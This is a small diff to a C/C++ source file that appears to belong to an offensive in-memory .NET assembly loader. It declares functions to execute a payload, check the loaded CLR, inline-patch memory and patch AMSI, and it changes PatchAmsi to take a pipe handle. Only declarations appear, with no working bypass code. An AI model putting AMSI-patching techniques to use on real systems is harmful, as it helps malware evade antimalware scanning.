@@ -18,6 +18,6 @@ using namespace mscorlib;
 
 VOID Execute(LPVOID lpPayload);
 BOOL FindVersion(void * assembly, int length);
-BOOL PatchAmsi();
+BOOL PatchAmsi(HANDLE pipe);
 BOOL ClrIsLoaded(LPCWSTR versione, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo);
 INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch, int patchsize);
